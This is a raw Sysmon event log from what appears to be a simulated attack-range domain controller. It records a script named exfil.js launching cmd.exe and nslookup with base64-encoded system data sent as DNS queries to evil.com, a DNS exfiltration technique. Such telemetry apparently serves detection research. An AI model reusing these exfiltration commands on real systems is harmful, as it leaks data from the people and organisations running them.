10341000x8000000000000000209246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.746{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-C743-000000005F02}4152C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.746{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-C743-000000005F02}4152C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.728{2E1864BB-18EC-629A-C743-000000005F02}4152408C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-C643-000000005F02}6408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.728{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-C743-000000005F02}4152C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.716{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.716{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.716{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.716{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.716{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-C643-000000005F02}6408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.716{2E1864BB-18E0-629A-6742-000000005F02}39767052C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-C643-000000005F02}6408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.717{2E1864BB-18EC-629A-C643-000000005F02}6408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaevh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.697{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxll.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000209234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.697{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=051F22A1CB76B1E9F8AF5B0C098202B3,SHA256=DE62FE91E66A8A8CDB0FF2F13D0EA10D8109AAF2E1B651DE0F1FCF1676D11321,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.681{2E1864BB-18EC-629A-C443-000000005F02}13002608C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-C543-000000005F02}7964C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.681{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-C543-000000005F02}7964C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.681{2E1864BB-18EC-629A-C343-000000005F02}73807060C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-C543-000000005F02}7964C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.688{2E1864BB-18EC-629A-C543-000000005F02}7964C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-C343-000000005F02}7380C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxll.tmp 2>&1 10341000x8000000000000000209225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.659{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-C443-000000005F02}1300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.659{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-C443-000000005F02}1300C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.659{2E1864BB-18EC-629A-C443-000000005F02}13002608C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-C343-000000005F02}7380C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.644{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-C443-000000005F02}1300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.644{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-C343-000000005F02}7380C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.628{2E1864BB-18E0-629A-6742-000000005F02}39764192C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-C343-000000005F02}7380C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.643{2E1864BB-18EC-629A-C343-000000005F02}7380C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxll.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 